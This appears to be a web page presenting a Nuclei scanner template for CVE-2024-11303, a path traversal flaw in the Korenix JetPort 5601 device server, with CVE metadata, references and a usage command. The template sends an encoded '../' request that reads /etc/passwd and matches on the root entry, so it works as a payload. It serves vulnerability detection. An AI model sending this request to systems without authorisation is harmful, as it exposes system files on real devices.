Skip to content

Korenix JetPort 5601v3 - Path Traversal

ID: CVE-2024-11303

Severity: high

Author: geeknik

Tags: seclists,cve,cve2024,korenix,lfi

The pathname of the root directory to a Restricted Directory (‘Path Traversal’) vulnerability in Korenix JetPort 5601 allows Path Traversal.This issue affects JetPort 5601- through 1.2.

id: CVE-2024-11303
info:
name: Korenix JetPort 5601v3 - Path Traversal
author: geeknik
severity: high
description: |
The pathname of the root directory to a Restricted Directory ('Path Traversal') vulnerability in Korenix JetPort 5601 allows Path Traversal.This issue affects JetPort 5601- through 1.2.
reference:
- https://seclists.org/fulldisclosure/2024/Nov/8
- https://www.korenix.com/en/about/index.aspx?kind=3
- https://cyberdanube.com/en/en-st-polten-uas-path-traversal-in-korenix-jetport/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
epss-score: 0.00044
epss-percentile: 0.11869
metadata:
max-request: 1
tags: seclists,cve,cve2024,korenix,lfi
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a0047304502202aab875f72a57edf639ffbe79ca40cb40d255fbdefab01074403b3789eb045d3022100916771017325debfe1f3387dfb4d8a6f7c4e589f5861255f69c3878d2714038c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-11303.yaml"

View on Github